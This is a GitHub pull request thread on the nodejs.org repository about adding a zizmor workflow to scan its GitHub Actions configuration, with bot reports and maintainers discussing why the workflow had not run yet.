feat(ci): add zizmor

[avivkeller]

Ref: nodejs/web-team#113
Ref: https://openjs-foundation.slack.com/archives/C0ALRN98G8K/p1773689960844809 (🔒)

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
nodejs-org	Ready	Preview	Mar 18, 2026 2:09pm

[github-actions]

👋 Codeowner Review Request

The following codeowners have been identified for the changed files:

Team reviewers: @nodejs/web-infra

Please review the changes when you have a chance. Thank you! 🙏

[Copilot]

Pull request overview

Adds a dedicated GitHub Actions workflow to run zizmor for security analysis of this repository’s GitHub Actions configuration, aligning with the referenced web-team security initiative.

Changes:

• Introduces a new workflow that runs on push and pull_request to main.
• Uses pinned SHAs for actions/checkout and zizmorcore/zizmor-action.

---

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

You can also share your feedback on Copilot code review. Take the survey.

[github-actions]

📦 Build Size Comparison

Summary

Metric	Value
Old Total Size	3.51 MB
New Total Size	3.51 MB
Delta	0 B (0.00%)

Changes

➕ Added Assets (1)

Name	Size
.next/static/chunks/f782acd83beef83f.js	208.90 KB

➖ Removed Assets (1)

Name	Size
.next/static/chunks/7ca6b57274045541.js	208.90 KB

[flakey5]

lgtm other than https://github.com/nodejs/nodejs.org/pull/8728/changes#r2943202991

[MattIPv4]

🤔 I don't see this having run on this PR? I would imagine there will be a lot of changes to other workflows required before Zizmor can pass?

[avivkeller]

🤔 I don't see this having run on this PR? I would imagine there will be a lot of changes to other workflows required before Zizmor can pass?

I copied this workflow from Zizmor's documentation, I can, of course, remove that trigger.

Im not sure if it will fail PRs, or just report them as having security concerns.

Perhaps I should push another commit with the fixes to the issues it would find?

[MattIPv4]

We're also going to want a branch ruleset change I imagine to block PRs where we have Zizmor failings if we're using the advanced security mode?

[MattIPv4]

Im not sure if it will fail PRs, or just report them as having security concerns.

It will just report them unless we add a new rule. But, I don't see it running at all? It would show up as a passing Actions check still as it is being run on the PR trigger?

[avivkeller]

Im not sure if it will fail PRs, or just report them as having security concerns.

It will just report them unless we add a new rule. But, I don't see it running at all? It would show up as a passing Actions check still as it is being run on the PR trigger?

It won't run on this PR, since it's the one that added it (GitHub is weird that way)

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 75.12%. Comparing base (783305e) to head (e9abd33).
⚠️ Report is 2 commits behind head on main.
✅ All tests successful. No failed tests found.

Additional details and impacted files

@@           Coverage Diff           @@
##             main    #8728   +/-   ##
=======================================
  Coverage   75.12%   75.12%           
=======================================
  Files         104      104           
  Lines        9167     9167           
  Branches      315      315           
=======================================
  Hits         6887     6887           
  Misses       2278     2278           
  Partials        2        2           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

[ovflowd]

SGTM

[avivkeller]

@nodejs/web-admins remember to add the action to the allowlist

[MattIPv4]

It won't run on this PR, since it's the one that added it (GitHub is weird that way)

This is false... When you add a new workflow with a pull_request trigger, it will run on the PR that introduces it (assuming the PR isn't a fork).

@nodejs/web-admins remember to add the action to the allowlist

This is why the workflow hasn't run, if you'd actually checked...

https://github.com/nodejs/nodejs.org/actions/runs/23171995051

Let's actually check the workflow runs and works before we blindly merge the change, please.

[MattIPv4]

I've added the action to the list. If you can push a change to cause the CI to run again, that'd be appreciated so we can actually validate the workflow is going to work.

[github-advanced-security]

You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool.

What Enabling Code Scanning Means:

• The 'Security' tab will display more code scanning analysis results (e.g., for the default branch).
• Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results.
• You will be able to see the analysis results for the pull request's branch on this overview once the scans have completed and the checks have passed.

For more information about GitHub Code Scanning, check out the documentation.

[avivkeller]

This is why the workflow hasn't run, if you'd actually checked...

I'm sorry I was mistaken previously